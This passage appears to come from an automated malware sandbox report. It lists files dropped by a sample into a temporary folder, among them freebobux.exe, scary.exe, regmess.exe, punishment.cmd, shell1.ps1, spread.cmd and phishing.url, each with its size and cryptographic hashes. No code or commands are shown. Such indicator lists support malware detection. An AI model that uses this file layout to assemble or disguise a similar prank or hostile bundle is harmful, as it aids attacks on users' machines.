                                                                                                                                                                          d6b389a0317505945493b4bfc71c6d51

                                                                                                                                                                          SHA1

                                                                                                                                                                          a2027bc409269b90f4e33bb243adeb28f7e1e37b

                                                                                                                                                                          SHA256

                                                                                                                                                                          d94ed2f7aa948e79e643631e0cd73cf6a221790c05b50ad1d6220965d85ac67c

                                                                                                                                                                          SHA512

                                                                                                                                                                          4ea3c8bdee2b9e093d511a7e4ded557f182df8d96e798cb9ee95014f3b99ebd21f889516e5f934033b01b7ca1e26f5444f2e6be0cc0d7fba0b3faa4cea40e187

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\3\IMG_1344.MP4

                                                                                                                                                                          Filesize

                                                                                                                                                                          448KB

                                                                                                                                                                          MD5

                                                                                                                                                                          038725879c68a8ebe2eaa26879c65574

                                                                                                                                                                          SHA1

                                                                                                                                                                          34062adf5ac391effba12d2cfd9f349b56fd12dc

                                                                                                                                                                          SHA256

                                                                                                                                                                          eec8517fe10284368ed5c5b38b7998f573cc6a9d06ae535fe0057523819788be

                                                                                                                                                                          SHA512

                                                                                                                                                                          7b494cd77cb3f2aff8fd6aa68a9ba5cfc87fcaefa36b882e2f930bf82029526257c41a5205364cafc66f4c0f5d154cc1dfe44a6db06952075047975e2156e564

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\3\IMG_1598.MP4

                                                                                                                                                                          Filesize

                                                                                                                                                                          1.5MB

                                                                                                                                                                          MD5

                                                                                                                                                                          808c2e1e12ddd159f91ed334725890f4

                                                                                                                                                                          SHA1

                                                                                                                                                                          96522421df4eb56c6d069a29fa4e1202c54eb4e4

                                                                                                                                                                          SHA256

                                                                                                                                                                          5588c6bf5b74c0a8b088787a536ef729bcedaedfc554ef317beea7fca3b392f7

                                                                                                                                                                          SHA512

                                                                                                                                                                          f6205b07c68f3b6abe7daf0517fbc07def4cb471bd754cd25333f5301dc9f1ac439217c6a09c875376ece4f6fb348e8b9e44e6e8a813ac5d8078cedc5b60bb3c

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\3\IMG_1599.MP4

                                                                                                                                                                          Filesize

                                                                                                                                                                          2.7MB

                                                                                                                                                                          MD5

                                                                                                                                                                          06947b925a582d2180ed7be2ba196377

                                                                                                                                                                          SHA1

                                                                                                                                                                          34f35738fdf5c51fa28093ee06be4c12fcbd9fda

                                                                                                                                                                          SHA256

                                                                                                                                                                          b09bd14497d3926dc3717db9a3607c3cec161cc5b73c1af7e63d9ccce982a431

                                                                                                                                                                          SHA512

                                                                                                                                                                          27f6e3882db9f88834023ff3ece9f39cb041548e772af89d49c97fea7d7ceb4f2efdc019a89c0edf3308929a88fd488749fec97c63b836de136c437300b9ff73

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\3\IMG_1689.MP4

                                                                                                                                                                          Filesize

                                                                                                                                                                          1.8MB

                                                                                                                                                                          MD5

                                                                                                                                                                          1e5c2785bd0dd68ba46ddca622960eb5

                                                                                                                                                                          SHA1

                                                                                                                                                                          f99901491d60b748c470dca28f4f7d423eaa42e0

                                                                                                                                                                          SHA256

                                                                                                                                                                          1e199487c53b09a93d573ff9eee56aadb70de38ffa8d2d89001dca9ab8fdac96

                                                                                                                                                                          SHA512

                                                                                                                                                                          dbb768da8ddc14b5ffbda956258296a4f94cb49775c03cfe5f9e64e402938ec1c045685a14e44294cb31520c4c389d6c742f3f47e2acb46d0d9e96ec1ff4c58e

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\3\IMG_1741.MP4

                                                                                                                                                                          Filesize

                                                                                                                                                                          2.4MB

                                                                                                                                                                          MD5

                                                                                                                                                                          5bf2d9277e2aaaf852d4b65d1e9bba67

                                                                                                                                                                          SHA1

                                                                                                                                                                          5d8876a9c641fc67b1f5fd23da079952fa879cfd

                                                                                                                                                                          SHA256

                                                                                                                                                                          3fbbdfbaa057533ad30787257bd31252fad8bfaaafabcd78473196d9b8fc6820

                                                                                                                                                                          SHA512

                                                                                                                                                                          848e43d7b0968b0e096e01078db51e029dc8014800a738fee43e39c7bf76ee616347424349a9a5a79af1af46c7f8c01501a6765746326f41a69791de5300523c

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\3\IMG_1870.MP4

                                                                                                                                                                          Filesize

                                                                                                                                                                          2.9MB

                                                                                                                                                                          MD5

                                                                                                                                                                          092a111c6a159e3cb263fdaa9781c9d5

                                                                                                                                                                          SHA1

                                                                                                                                                                          fdeeb752db60e5e299e54b46c932908507dd2615

                                                                                                                                                                          SHA256

                                                                                                                                                                          54ca5ae616974ce576379652479c7b74817c6ed35ba150e5fa19ca92c995324c

                                                                                                                                                                          SHA512

                                                                                                                                                                          24a27b7c3b92607aa69aa2a329b1063278d48ef6d61baa6f3fa41ec50aa36968bc5897e0c2db22e1fc6b9e92a11365b796f2c47197b4c1187e953535fdd40982

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\3\IMG_5049.MP4

                                                                                                                                                                          Filesize

                                                                                                                                                                          956KB

                                                                                                                                                                          MD5

                                                                                                                                                                          1649d1b2b5b360ee5f22bb9e8b3cd54c

                                                                                                                                                                          SHA1

                                                                                                                                                                          ae18b6bf3bfa29b54fee35a321162d425179fc7e

                                                                                                                                                                          SHA256

                                                                                                                                                                          d1304d5a157d662764394ca6f89dcad493c747f800c0302bbd752bf61929044e

                                                                                                                                                                          SHA512

                                                                                                                                                                          c77b5bad117fda5913866be9df54505698f40ef78bf75dad8a077c33b13955222693e6bc5f4b5b153cfb54ff4d743403b1fd161270fa01ad47e18c2414c3d409

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\3\IMG_5068.MP4

                                                                                                                                                                          Filesize

                                                                                                                                                                          4.3MB

                                                                                                                                                                          MD5

                                                                                                                                                                          91eb9128663e8d3943a556868456f787

                                                                                                                                                                          SHA1

                                                                                                                                                                          b046c52869c0ddcaec3de0cf04a0349dfa3bd9c3

                                                                                                                                                                          SHA256

                                                                                                                                                                          f5448c8e4f08fa58cb2425ab61705ade8d56a6947124dea957941e5f37356cd3

                                                                                                                                                                          SHA512

                                                                                                                                                                          c0d7196f852fc0434b2d111e3cf11c9fd2cb27485132b7ce22513fe3c87d5ad0767b8f35c36948556bce27dcc1b4aa21fbb21414637f13071d45f18c9ae32bf6

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\3\IMG_5343.MP4

                                                                                                                                                                          Filesize

                                                                                                                                                                          1.7MB

                                                                                                                                                                          MD5

                                                                                                                                                                          180722cbf398f04e781f85e0155fa197

                                                                                                                                                                          SHA1

                                                                                                                                                                          77183c68a012f869c1f15ba91d959d663f23232d

                                                                                                                                                                          SHA256

                                                                                                                                                                          94e998cedbbb024b3c7022492db05910e868bb0683d963236163c984aa88e02a

                                                                                                                                                                          SHA512

                                                                                                                                                                          bbece30927da877f7c103e0742466cda4b232fb69b2bf8ebe66a13bf625f5a66e131716b3a243bb5e25d89bd4bde0b004da8dd76200204c67a3d641e8087451d

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\spread.cmd

                                                                                                                                                                          Filesize

                                                                                                                                                                          104B

                                                                                                                                                                          MD5

                                                                                                                                                                          7a71a7e1d8c6edf926a0437e49ae4319

                                                                                                                                                                          SHA1

                                                                                                                                                                          d9b7a4f0ed4c52c9fbe8e3970140b47f4be0b5f1

                                                                                                                                                                          SHA256

                                                                                                                                                                          e0d127c00f9679fb359c04b6238b976f1541918a0df0d6c61f1a44e8f27846ae

                                                                                                                                                                          SHA512

                                                                                                                                                                          96a57412bda3f16e56398cd146ece11e3d42291dceff2aec22871a7e35e3b102b27151984ae0795ca6d5ef5385ef780906d9b13cec78cbbdf019a3de4792ca3a

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\f3cb220f1aaa32ca310586e5f62dcab1.pack

                                                                                                                                                                          Filesize

                                                                                                                                                                          894KB

                                                                                                                                                                          MD5

                                                                                                                                                                          34a66c4ec94dbdc4f84b4e6768aebf4e

                                                                                                                                                                          SHA1

                                                                                                                                                                          d6f58b372433ad5e49a20c85466f9fb3627abff2

                                                                                                                                                                          SHA256

                                                                                                                                                                          fcf530e33a354ac1de143e2f87960e85f694e99d7aa652408c146e8d0a1430fb

                                                                                                                                                                          SHA512

                                                                                                                                                                          4db51769dcee999baf3048c793dde9ad86c76f09fc17edd8e2f1dedf91cf224ddfbe9554c4ff14659ea0f6663b054953ec2ab9d964e6e9ca44ee744e02b7e5b9

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\freebobux.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          779KB

                                                                                                                                                                          MD5

                                                                                                                                                                          794b00893a1b95ade9379710821ac1a4

                                                                                                                                                                          SHA1

                                                                                                                                                                          85c7b2c351700457e3d6a21032dfd971ccb9b09d

                                                                                                                                                                          SHA256

                                                                                                                                                                          5ac42d75e244d33856971120a25bd77f2c0712177384dfa61fb90c0e7790d34c

                                                                                                                                                                          SHA512

                                                                                                                                                                          3774d4aed0cce7ed257d31a2bb65dda585d142c3c527dc32b40064d22d9d298dd183c52603561c9c1e96dd02737a8b2237c433cf7a74dccb0a25191446d60017

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\handler.cmd

                                                                                                                                                                          Filesize

                                                                                                                                                                          225B

                                                                                                                                                                          MD5

                                                                                                                                                                          c1e3b759a113d2e67d87468b079da7dc

                                                                                                                                                                          SHA1

                                                                                                                                                                          3b280e1c66c7008b4f123b3be3aeb635d4ab17c3

                                                                                                                                                                          SHA256

                                                                                                                                                                          b434261414e7c75437e8c47aba9a5b73fcb8cffbf0870998f50edc46084d1da5

                                                                                                                                                                          SHA512

                                                                                                                                                                          20a1494027a5cf10f4cc71722a7a4e685fc7714ba08598dd150c545f644e139ddb200fb0b5517f5491a70d8644e90c8f60e8c457bc5d8eb0bb451120b40b8447

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\helper.vbs

                                                                                                                                                                          Filesize

                                                                                                                                                                          26B

                                                                                                                                                                          MD5

                                                                                                                                                                          7a97744bc621cf22890e2aebd10fd5c8

                                                                                                                                                                          SHA1

                                                                                                                                                                          1147c8df448fe73da6aa6c396c5c53457df87620

                                                                                                                                                                          SHA256

                                                                                                                                                                          153fed1733e81de7f9d221a1584a78999baa93bc8697500d8923550c774ed709

                                                                                                                                                                          SHA512

                                                                                                                                                                          89c73b73d4b52cf8e940fa2f1580fdc89f902b1eeb4b2abc17f09229a6130532a08cdb91205b9813a65cb7cd31ca020fe728b03d9a0fabb71131864c2966f967

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\install.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          878B

                                                                                                                                                                          MD5

                                                                                                                                                                          1e800303c5590d814552548aaeca5ee1

                                                                                                                                                                          SHA1

                                                                                                                                                                          1f57986f6794cd13251e2c8e17d9e00791209176

                                                                                                                                                                          SHA256

                                                                                                                                                                          7d815f37d808bc350a3c49810491d5df0382409347ebae7a3064a535d485c534

                                                                                                                                                                          SHA512

                                                                                                                                                                          138009bc110e70983d2f7f4e0aba0ee7582b46491513aae423461b13c5a186efcf8cdf82a91980302d1c80e7bae00e65fb52a746a0f9af17a8eb663be04bb23e

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\jaffa.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          512KB

                                                                                                                                                                          MD5

                                                                                                                                                                          6b1b6c081780047b333e1e9fb8e473b6

                                                                                                                                                                          SHA1

                                                                                                                                                                          8c31629bd4a4ee29b7ec1e1487fed087f5e4b1de

                                                                                                                                                                          SHA256

                                                                                                                                                                          e649b6e4284404bfa04639b8bf06367777c48201ef27dcdc256fe59167935fac

                                                                                                                                                                          SHA512

                                                                                                                                                                          022d40c1801fa495c9298d896221c8eefbad342d41922df8d014f2f49c3fe7fa91d603e0ee0de6be6f2143f9e0c4a6756b19260166ebd62ec3e1c64ad22bc447

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\jkka.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          1002KB

                                                                                                                                                                          MD5

                                                                                                                                                                          42e4b26357361615b96afde69a5f0cc3

                                                                                                                                                                          SHA1

                                                                                                                                                                          35346fe0787f14236296b469bf2fed5c24a1a53d

                                                                                                                                                                          SHA256

                                                                                                                                                                          e58a07965ef711fc60ab82ac805cfc3926e105460356dbbea532ba3d9f2080eb

                                                                                                                                                                          SHA512

                                                                                                                                                                          fb8a2f4a9f280c0e3c0bb979016c11ea217bae9cebd06f7f2b5ef7b8973b98128ebc2e5cf76b824d71b889fca4510111a79b177dab592f332131f0d6789673a5

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\lupa.png

                                                                                                                                                                          Filesize

                                                                                                                                                                          5KB

                                                                                                                                                                          MD5

                                                                                                                                                                          0a9d964a322ad35b99505a03e962e39a

                                                                                                                                                                          SHA1

                                                                                                                                                                          1b5fed1e04fc22dea2ae82a07c4cfd25b043fc51

                                                                                                                                                                          SHA256

                                                                                                                                                                          48cdea2dd75a0def891f0d5a2b3e6c611cfe0985125ac60915f3da7cacb2cd2b

                                                                                                                                                                          SHA512

                                                                                                                                                                          c4c9f019928f5f022e51b3f8eb7a45f4a35e609c66a41efc8df937762b78a47fc91736fac1a03003ca85113411f4b647a69605e66c73c778d98c842799e65d0d

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\phishing.url

                                                                                                                                                                          Filesize

                                                                                                                                                                          1KB

                                                                                                                                                                          MD5

                                                                                                                                                                          6f62e208aad51e2d5ef2a12427b36948

                                                                                                                                                                          SHA1

                                                                                                                                                                          453eaf5afef9e82e2f50e0158e94cc1679b21bea

                                                                                                                                                                          SHA256

                                                                                                                                                                          cf0b709df6dfcb49d30e8bc0b9893aa9bd360e5894e08915b211829d2ae8536b

                                                                                                                                                                          SHA512

                                                                                                                                                                          f4732026625df183377c0c32baec3b663582d59ae59687d426d7637b5d701b3a169e0769b0106f8d9d8b42691697f12d0ed73a607f7bcd99d1f210ec98408501

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\punishment.cmd

                                                                                                                                                                          Filesize

                                                                                                                                                                          200B

                                                                                                                                                                          MD5

                                                                                                                                                                          c8d2a5c6fe3c8efa8afc51e12cf9d864

                                                                                                                                                                          SHA1

                                                                                                                                                                          5d94a4725a5eebb81cfa76100eb6e226fa583201

                                                                                                                                                                          SHA256

                                                                                                                                                                          c2a655fef120a54658b2559c8344605a1ca4332df6079544ff3df91b7ecadbdb

                                                                                                                                                                          SHA512

                                                                                                                                                                          59e525a5296160b22b2d94a3a1cfb842f54fc08a9eb3dbcda7fd9e7355842eae86b7d478175fc06ee35d7836110e1091522daf523aeb2e6d851ee896770cd8b5

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\punishment.vbs

                                                                                                                                                                          Filesize

                                                                                                                                                                          97B

                                                                                                                                                                          MD5

                                                                                                                                                                          c38e912e4423834aba9e3ce5cd93114b

                                                                                                                                                                          SHA1

                                                                                                                                                                          eab7bf293738d535bb447e375811d6daccc37a11

                                                                                                                                                                          SHA256

                                                                                                                                                                          c578d53f5dd1b954bce9c4a176c00f6f84424158b9990af2acb94f3060d78cc1

                                                                                                                                                                          SHA512

                                                                                                                                                                          5df1c1925d862c41822b45ae51f7b3ed08e0bc54cb38a41422d5e3faf4860d3d849b1c9bbadffa2fc88ee41a927e36cd7fcf9cd92c18753e3e2f02677ec50796

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\readme.md

                                                                                                                                                                          Filesize

                                                                                                                                                                          167B

                                                                                                                                                                          MD5

                                                                                                                                                                          5ae93516939cd47ccc5e99aa9429067c

                                                                                                                                                                          SHA1

                                                                                                                                                                          3579225f7f8c066994d11b57c5f5f14f829a497f

                                                                                                                                                                          SHA256

                                                                                                                                                                          f815e2d4180ba6f5d96ab9694602ac42cde288b349cf98a90aad9bd76cc07589

                                                                                                                                                                          SHA512

                                                                                                                                                                          c2dd5a075d1d203d67752a3fff5661863d7da6c2d3d88f5d428f0b32c57df750c24459a782174b013a89bbfbf84d8fb964a2bec06fc0609dc44cc10519e62713

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\regmess.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          536KB

                                                                                                                                                                          MD5

                                                                                                                                                                          5c4d7e6d02ec8f694348440b4b67cc45

                                                                                                                                                                          SHA1

                                                                                                                                                                          be708ac13886757024dd2288ddd30221aed2ed86

                                                                                                                                                                          SHA256

                                                                                                                                                                          faaa078106581114b3895fa8cf857b2cddc9bfc37242c53393e34c08347b8018

                                                                                                                                                                          SHA512

                                                                                                                                                                          71f990fe09bf8198f19cc442d488123e95f45e201a101d01f011bd8cdf99d6ccd2d0df233da7a0b482eab0595b34e234f4d14df60650c64f0ba0971b8345b41f

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\scary.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          3.1MB

                                                                                                                                                                          MD5

                                                                                                                                                                          97cd39b10b06129cb419a72e1a1827b0

                                                                                                                                                                          SHA1

                                                                                                                                                                          d05b2d7cfdf8b12746ffc7a59be36634852390bd

                                                                                                                                                                          SHA256

                                                                                                                                                                          6bc108ddb31a255fdd5d1e1047dcd81bc7d7e78c96f7afa9362cecbb0a5b3dbc

                                                                                                                                                                          SHA512

                                                                                                                                                                          266d5c0eb0264b82d703d7b5dc22c9e040da239aaca1691f7e193f5391d7bafc441aff3529e42e84421cf80a8d5fca92c2b63019c3a475080744c7f100ea0233

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\screenshot.png

                                                                                                                                                                          Filesize

                                                                                                                                                                          266KB

                                                                                                                                                                          MD5

                                                                                                                                                                          de8ddeeb9df6efab37b7f52fe5fb4988

                                                                                                                                                                          SHA1

                                                                                                                                                                          61f3aac4681b94928bc4c2ddb0f405b08a8ade46

                                                                                                                                                                          SHA256

                                                                                                                                                                          47b5cbeb94eaec10a7c52458195d5ba7e2e53d732e9e750f1092eb016fd65159

                                                                                                                                                                          SHA512

                                                                                                                                                                          6f8e30ddb646ea5685b0f622b143cdd7bc5574a765f4f14797df45739afcdefaba7786bac9ad8637c64893a33f14e5adcfb3af5869fc10c105760a844108e27e

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\selfaware.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          797KB

                                                                                                                                                                          MD5

                                                                                                                                                                          5cb9ba5071d1e96c85c7f79254e54908

                                                                                                                                                                          SHA1

                                                                                                                                                                          3470b95d97fb7f1720be55e033d479d6623aede2

                                                                                                                                                                          SHA256

                                                                                                                                                                          53b21dcfad586cdcb2bb08d0cfe62f0302662ebe48d3663d591800cf3e8469a5

                                                                                                                                                                          SHA512

                                                                                                                                                                          70d4f6c62492209d497848cf0e0204b463406c5d4edf7d5842a8aa2e7d4edb2090f2d27862841a217786e6813198d35ea29b055e0118b73af516edf0c79dcfad

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\shell1.ps1

                                                                                                                                                                          Filesize

                                                                                                                                                                          356B

                                                                                                                                                                          MD5

                                                                                                                                                                          29a3efd5dbe76b1c4bbc2964f9e15b08

                                                                                                                                                                          SHA1

                                                                                                                                                                          02c2fc64c69ab63a7a8e9f0d5d55fe268c36c879

                                                                                                                                                                          SHA256

                                                                                                                                                                          923ad6ca118422ee9c48b3cc23576ee3c74d44c0e321a60dc6c2f49921aea129

                                                                                                                                                                          SHA512

                                                                                                                                                                          dfa3cdaab6cc78dddf378029fdb099e4bb1d9dcad95bd6cd193eca7578c9d0de832ae93c5f2035bc6e000299ad4a157cc58e6b082287e53df94dcc9ddbab7c96

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\spinner.gif

                                                                                                                                                                          Filesize

                                                                                                                                                                          44KB

                                                                                                                                                                          MD5

                                                                                                                                                                          324f8384507560259aaa182eb0c7f94a

                                                                                                                                                                          SHA1

                                                                                                                                                                          3b86304767e541ddb32fdda2e9996d8dbeca16ed

                                                                                                                                                                          SHA256

                                                                                                                                                                          f48c4f9c5fc87e8d7679948439544a97f1539b423860e7c7470bd9b563aceab5

                                                                                                                                                                          SHA512

                                                                                                                                                                          cc1b61df496cfb7c51d268139c6853d05bace6f733bc13c757c87cd64a11933c3a673b97fba778e515a9ff5f8c4ea52e7091f3beda1d8452bc3f6b59382f300d

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\stopwerfault.cmd

                                                                                                                                                                          Filesize

                                                                                                                                                                          42B

                                                                                                                                                                          MD5

                                                                                                                                                                          7eacd2dee5a6b83d43029bf620a0cafa

                                                                                                                                                                          SHA1

                                                                                                                                                                          9d4561fa2ccf14e05265c288d8e7caa7a3df7354

                                                                                                                                                                          SHA256

                                                                                                                                                                          d2ac09afa380a364682b69e5d5f6d30bb0070ca0148f4077204c604c8bfae03b

                                                                                                                                                                          SHA512

                                                                                                                                                                          fd446a8968b528215df7c7982d8dae208b0d8741410d7911023acee6ad78fee4fdec423a5f85dd00972a6ac06b24a63518f741490deab97639628b19256791f8

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\the.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          764KB

                                                                                                                                                                          MD5

                                                                                                                                                                          e45dcabc64578b3cf27c5338f26862f1

                                                                                                                                                                          SHA1

                                                                                                                                                                          1c376ec14025cabe24672620dcb941684fbd42b3

                                                                                                                                                                          SHA256

                                                                                                                                                                          b05176b5e31e9e9f133235deb31110798097e21387d17b1def7c3e2780bbf455

                                                                                                                                                                          SHA512

                                                                                                                                                                          5d31565fbb1e8d0effebe15edbf703b519f6eb82d1b4685661ce0efd6a25d89596a9de27c7690c7a06864ce957f8f7059c8fdee0993023d764168c3f3c1b8da9

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\web.htm

                                                                                                                                                                          Filesize

                                                                                                                                                                          367B

                                                                                                                                                                          MD5

                                                                                                                                                                          f63c0947a1ee32cfb4c31fcbc7af3504

                                                                                                                                                                          SHA1

                                                                                                                                                                          ee46256901fa8a5c80e4a859f0f486e84c61cbaa

                                                                                                                                                                          SHA256

                                                                                                                                                                          bfe43062464da1f859ea3c2adace8ff251e72d840b32ef78c15b64c99f56d541

                                                                                                                                                                          SHA512

                                                                                                                                                                          1f8666abfd3e5543710c6d2c5fb8c506d10d9f0f0306b25ba81176aa595a5afa8c288b522832f8ffe0a12873eaf2c2a0eff49ce4caa88400e8db7a8870a42184

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\web2.htm

                                                                                                                                                                          Filesize

                                                                                                                                                                          684B

                                                                                                                                                                          MD5

                                                                                                                                                                          1fc6bb77ac7589f2bffeaf09bcf7a0cf

                                                                                                                                                                          SHA1

                                                                                                                                                                          028bdda6b433e79e9fbf021b94b89251ab840131

                                                                                                                                                                          SHA256

                                                                                                                                                                          5d0147dc2b94b493d34efd322da66921f2d3d2b1cc7b0226ac1d494f99a933a1

                                                                                                                                                                          SHA512

                                                                                                                                                                          6ef21162b85975fdd58628dcab0d610ce7acd8ab36820a09e9e8eb1e6b2d76060ed4ad2b48bdbe1e212ec84abb309e124a752e078f6747893a83562824ea6af6

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\web3.htm

                                                                                                                                                                          Filesize

                                                                                                                                                                          904KB

                                                                                                                                                                          MD5

                                                                                                                                                                          9e118cccfa09666b2e1ab6e14d99183e

                                                                                                                                                                          SHA1

                                                                                                                                                                          e6d3ab646aa941f0ca607f12b968c1e45c1164b4

                                                                                                                                                                          SHA256

                                                                                                                                                                          d175dc88764d5ea95f19148d52fde1262125fedb41937dc2134f6f787ae26942

                                                                                                                                                                          SHA512

                                                                                                                                                                          da02267196129ebeaa4c5ff74d63351260964fa8535343e3f10cd3fcf8f0e3d0a87c61adb84ec68b4770d3ef86535d11e4eacf6437c5f5fbe52c34aa6e07bd04

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\wim.dll

                                                                                                                                                                          Filesize

                                                                                                                                                                          13.4MB

                                                                                                                                                                          MD5

                                                                                                                                                                          9191cec82c47fb3f7249ff6c4e817b34

                                                                                                                                                                          SHA1

                                                                                                                                                                          1d9854a78de332bc45c1712b0c3dac3fe6fda029

                                                                                                                                                                          SHA256

                                                                                                                                                                          55ef4ff325d653a53add0ca6c41bc3979cdb4fc3ef1c677998dc2c9ea263c15b

                                                                                                                                                                          SHA512

                                                                                                                                                                          2b482e947e26e636e7ed077b914788b1af8c28722efcbd481dd22940cfb771e38c3e2ed6c8f9208eb813085c7d4460978e13a5ef52441e7be7ada9f6414a6673

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\wimloader.dll

                                                                                                                                                                          Filesize

                                                                                                                                                                          667KB

                                                                                                                                                                          MD5

                                                                                                                                                                          a67128f0aa1116529c28b45a8e2c8855

                                                                                                                                                                          SHA1

                                                                                                                                                                          5fbaf2138ffc399333f6c6840ef1da5eec821c8e

                                                                                                                                                                          SHA256

                                                                                                                                                                          8dc7e5dac39d618c98ff9d8f19ecb1be54a2214e1eb76e75bd6a27873131d665

                                                                                                                                                                          SHA512

                                                                                                                                                                          660d0ced69c2c7dd002242c23c8d33d316850505fc30bad469576c97e53e59a32d13aa55b8b64459c180e7c76ea7f0dae785935f69d69bbd785ee7094bd9b94b

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\xcer.cer

                                                                                                                                                                          Filesize

                                                                                                                                                                          1KB

                                                                                                                                                                          MD5

                                                                                                                                                                          a58d756a52cdd9c0488b755d46d4df71

                                                                                                                                                                          SHA1

                                                                                                                                                                          0789b35fd5c2ef8142e6aae3b58fff14e4f13136

                                                                                                                                                                          SHA256

                                                                                                                                                                          93fc03df79caa40fa8a637d153e8ec71340af70e62e947f90c4200ccba85e975

                                                                                                                                                                          SHA512

                                                                                                                                                                          c31a9149701346a4c5843724c66c98aae6a1e712d800da7f2ba78ad9292ad5c7a0011575658819013d65a84853a74e548067c04c3cf0a71cda3ce8a29aad3423

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\.ba1\logo.png

                                                                                                                                                                          Filesize

                                                                                                                                                                          1KB

                                                                                                                                                                          MD5

                                                                                                                                                                          d6bd210f227442b3362493d046cea233

                                                                                                                                                                          SHA1

                                                                                                                                                                          ff286ac8370fc655aea0ef35e9cf0bfcb6d698de

                                                                                                                                                                          SHA256

                                                                                                                                                                          335a256d4779ec5dcf283d007fb56fd8211bbcaf47dcd70fe60ded6a112744ef

                                                                                                                                                                          SHA512

                                                                                                                                                                          464aaab9e08de610ad34b97d4076e92dc04c2cdc6669f60bfc50f0f9ce5d71c31b8943bd84cee1a04fb9ab5bbed3442bd41d9cb21a0dd170ea97c463e1ce2b5b

                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                                          Filesize

                                                                                                                                                                          285B

                                                                                                                                                                          MD5

                                                                                                                                                                          23f298d08a8b291eefe13ccb4a66a93b

                                                                                                                                                                          SHA1

                                                                                                                                                                          79d879c6cc50ab0d664250ca8028904c9e78caa3

                                                                                                                                                                          SHA256

                                                                                                                                                                          742ccde838f90034f2d52a00bf3e72acd674757ba08c00085874e3ab58b34476

                                                                                                                                                                          SHA512

